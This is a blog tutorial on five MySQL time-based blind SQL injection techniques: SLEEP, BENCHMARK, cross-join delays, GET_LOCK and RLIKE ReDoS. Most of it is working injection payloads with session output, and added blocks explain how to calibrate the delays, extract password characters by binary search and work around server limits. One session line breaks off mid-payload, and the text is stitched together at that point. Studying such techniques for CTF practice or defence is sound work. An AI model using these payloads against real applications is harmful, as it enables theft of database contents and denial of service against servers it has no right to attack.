linuxsec

Five time-based blind injection techniques

  • The sleep() function
  • The benchmark() function
BENCHMARK(count,expr)

BENCHMARK evaluates the expression expr count times, so the delay can be made as large as needed by raising the count. In the author's test, the repeated evaluation delayed the response by 1.90 s.
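As an added example (not from the original post), here is how sleep() and BENCHMARK() are wrapped so that the response time encodes a boolean. It assumes the page's ctf_test table; the BENCHMARK iteration count is an assumption that has to be calibrated on the target, because unlike SLEEP the delay depends on CPU speed and load.

```sql
-- Added example, not from the original post. Assumes the ctf_test(user, pwd) table used on this
-- page; the iteration count 10000000 is an assumption to be calibrated per server.

-- 1. Calibrate the primitive before using it blind. SLEEP(n) waits about n seconds regardless of
--    host speed; BENCHMARK burns CPU, so the same count gives different delays on different hosts.
SELECT SLEEP(2);
SELECT BENCHMARK(10000000, MD5('calibrate'));   -- raise or lower the count until this takes ~2 s

-- 2. Turn a boolean into a delay. IF() evaluates only the chosen branch, so the expensive
--    expression runs only when the guess about the first character of user() is right.
--    SLEEP() and BENCHMARK() both return 0, so the WHERE clause is false either way and no row
--    comes back: the timing, not the result set, carries the answer.
SELECT * FROM ctf_test
 WHERE user = '1'
   AND IF(SUBSTRING(user(), 1, 1) = 'r', SLEEP(2), 0);

SELECT * FROM ctf_test
 WHERE user = '1'
   AND IF(SUBSTRING(user(), 1, 1) = 'r', BENCHMARK(10000000, MD5('x')), 0);

-- 3. Compare on the character code instead of testing equality: a binary search over 0..127
--    needs about 7 timed requests per character instead of one request per candidate character.
SELECT * FROM ctf_test
 WHERE user = '1'
   AND IF(ASCII(SUBSTRING((SELECT pwd FROM ctf_test WHERE user = '1'), 1, 1)) > 64,
          BENCHMARK(10000000, MD5('x')), 0);
```

Always record the response time of a known-false and a known-true guess first; on a loaded server BENCHMARK jitter can exceed the gap between the two, in which case the count must go up or SLEEP, where available, is the safer primitive.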

  • Cartesian product blind injection

Injection technique

mysql> SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C;
+-----------+
| count(*)  |
+-----------+
| 113101560 |
+-----------+
1 row in set (2.07 sec)

mysql> select * from ctf_test where user='1' and 1=1 and (SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C);
+------+-----+
| user | pwd |
+------+-----+
| 1    | 0   |
+------+-----+
1 row in set (2.08 sec)

mysql> select * from ctf_test where user='1' and 1=0 and (SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C);
Empty set (0.01 sec)

The 1=0 query returns immediately because MySQL stops evaluating an AND chain once an operand is already false, while the 1=1 query pays the full cost of the cross join. Substituting the condition under test for 1=1 turns the response time into the answer.
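An added example, not from the original post, showing how the cross-join primitive is sized for a target and turned into a conditional probe. It assumes the page's ctf_test table; the pwd value being guessed ('0') is the page's sample row, and the information_schema row counts will differ on every server.

```sql
-- Added example, not from the original post. Assumes the ctf_test(user, pwd) table from this page.

-- The delay is proportional to |columns| * |columns| * |tables|, and those counts differ per
-- target (the page's server produced 113101560 rows), so check them before choosing how many
-- copies of each table to join.
SELECT (SELECT COUNT(*) FROM information_schema.columns) AS column_rows,
       (SELECT COUNT(*) FROM information_schema.tables)  AS table_rows;

-- The page's pattern with the truth test in place of 1=1: the cross join only runs when the guess
-- is true, because MySQL stops evaluating the AND chain at the first false operand.
SELECT * FROM ctf_test
 WHERE user = '1'
   AND SUBSTRING(pwd, 1, 1) = '0'
   AND (SELECT COUNT(*) FROM information_schema.columns A,
                             information_schema.columns B,
                             information_schema.tables  C);

-- On a server with a small information_schema, add another copy to scale the delay; on a large
-- one, drop to two copies so a single probe does not run for minutes and trip query timeouts.
SELECT * FROM ctf_test
 WHERE user = '1'
   AND SUBSTRING(pwd, 1, 1) = '0'
   AND (SELECT COUNT(*) FROM information_schema.columns A,
                             information_schema.columns B,
                             information_schema.tables  C,
                             information_schema.tables  D);
```

Time a deliberately false guess first (for example comparing against a character that cannot occur); if that probe is also slow, the subquery is being evaluated regardless of the guard and the condition should be moved into IF() as in the other techniques on this page.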

  • GET_LOCK blind injection

The official documentation for get_lock describes the behaviour this technique relies on: once one session has acquired the lock for a given name, a second session calling get_lock on the same name blocks for up to the specified timeout and then returns 0.

This method has a constraint: two sessions must be open at the same time, one that holds the lock and one that injects through.

SESSION A

mysql> select get_lock('lihuaiqiu',1);
+-------------------------+
| get_lock('lihuaiqiu',1) |
+-------------------------+
|                       1 |
+-------------------------+
1 row in set (0.00 sec)

SESSION B

mysql> select get_lock('lihuaiqiu',5);
+-------------------------+
| get_lock('lihuaiqiu',5) |
+-------------------------+
|                       0 |
+-------------------------+
1 row in set (5.00 sec)

mysql> select * from ctf_test where user='0' and 1=1 and  get_lock('lihuaiqiu',2);
Empty set (2.00 sec)

mysql> select * from ctf_test where user='0' and 1=0 and  get_lock('lihuaiqiu',2);
Empty set (0.00 sec)

The same exploitation pattern applies. Note that user='0' matches no row, yet the 1=1 variant still waits the full 2 seconds: the part of the WHERE clause that depends on no column is evaluated even when nothing matches, so the delay does not require an existing row.
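Added example, not from the original post: the full lock lifecycle across the two sessions, the conditional form of the probe, and the failure mode when the holding session goes away. The lock name 'blind_demo' is an assumption, as is the page's ctf_test table.

```sql
-- Added example, not from the original post. Lock name and table are assumptions.

-- Session A: acquire the lock and keep this connection open for the whole extraction.
-- A named lock belongs to the connection, not to a transaction; it is released only by
-- RELEASE_LOCK() or when the connection closes.
SELECT GET_LOCK('blind_demo', 0);        -- returns 1 when acquired
SELECT IS_USED_LOCK('blind_demo');       -- returns the connection id of the holder (A), NULL if free

-- Session B (the injection point): while A holds the name, GET_LOCK waits the full timeout and
-- returns 0, so the predicate is false and no row is returned; only the elapsed time differs
-- between a right and a wrong guess.
SELECT * FROM ctf_test
 WHERE user = '1'
   AND IF(SUBSTRING(user(), 1, 1) = 'r', GET_LOCK('blind_demo', 2), 0);

-- Failure mode: if A disconnects, the same call in B returns 1 at once and B now owns the lock,
-- so every subsequent probe looks "false". Check this before trusting a run of fast responses.
SELECT IS_FREE_LOCK('blind_demo');       -- 1 means nobody holds it and the delay primitive is gone

-- Cleanup, from the session that owns the lock.
SELECT RELEASE_LOCK('blind_demo');       -- 1 released, 0 held by another session, NULL never held
```

Because the lock lives on the connection, an application that uses a persistent connection pool changes the picture: an injected GET_LOCK(name, 0) issued through one request stays held by that pooled connection after the request finishes, and later probes block only when they land on a different connection. Run IS_USED_LOCK through the injection point to see which connection currently holds the name before interpreting timings.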

  • Regex DoS (RLIKE) injection

Delay principle: a pattern with nested quantifiers, matched against a long string that can never satisfy it, forces the regex engine into catastrophic backtracking (ReDoS) and burns CPU time. The effect is like the benchmark technique, except that the cost comes from one pathological match rather than from repeating a cheap expression many times.

Exploitation

mysql> select * from flag where flag='1' and if(mid(user(),1,1)='s',concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b',1);
+------+
| flag |
+------+
| 1    |
+------+
1 row in set (0.00 sec)

mysql> select * from flag where flag='1' and if(mid(user(),1,1)='r',concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,
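Added example, not from the original post, with a shorter calibration form of the page's ReDoS payload and the check a practitioner should run first: MySQL 8.0.4 and later replaced the Henry Spencer regex library with ICU and bound matching with regexp_time_limit, so on those servers the catastrophic-backtracking delay can turn into an error instead of a delay. The pad length is an assumption to tune; the table is the page's ctf_test.

```sql
-- Added example, not from the original post. Assumes the ctf_test table; the pad length 20000 is an
-- assumption: start small and increase until a true guess is clearly slower than a false one.

-- The page's pattern: nested (a.*)+ groups against a long run of 'a' with no trailing 'b' make the
-- matcher try every way of splitting the string before it can fail.
SET @payload := RPAD(1, 20000, 'a');
SELECT @payload RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b';

-- Conditional form. The false branch returns 1, so the row comes back fast; the true branch pays
-- the regex cost and returns 0 (the pattern never matches), so the row does not come back at all.
-- A slow empty result is therefore the "true" signal, a fast row the "false" one.
SELECT * FROM ctf_test
 WHERE user = '1'
   AND IF(SUBSTRING(user(), 1, 1) = 'r',
          RPAD(1, 20000, 'a') RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b',
          1);

-- Before relying on this against an unknown target, check the regex engine limits. MySQL 8.0.4+
-- uses ICU and aborts a match that exceeds regexp_time_limit with the error
-- "Timeout exceeded in regular expression match" rather than hanging; on 5.7 these variables
-- do not exist and the Spencer engine backtracks until the match completes.
SHOW VARIABLES LIKE 'regexp_%';
```

On an 8.0 server the error itself is still a usable oracle (error versus no error instead of slow versus fast), but it is no longer a time-based one, and a small regexp_time_limit means the payload size stops mattering.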
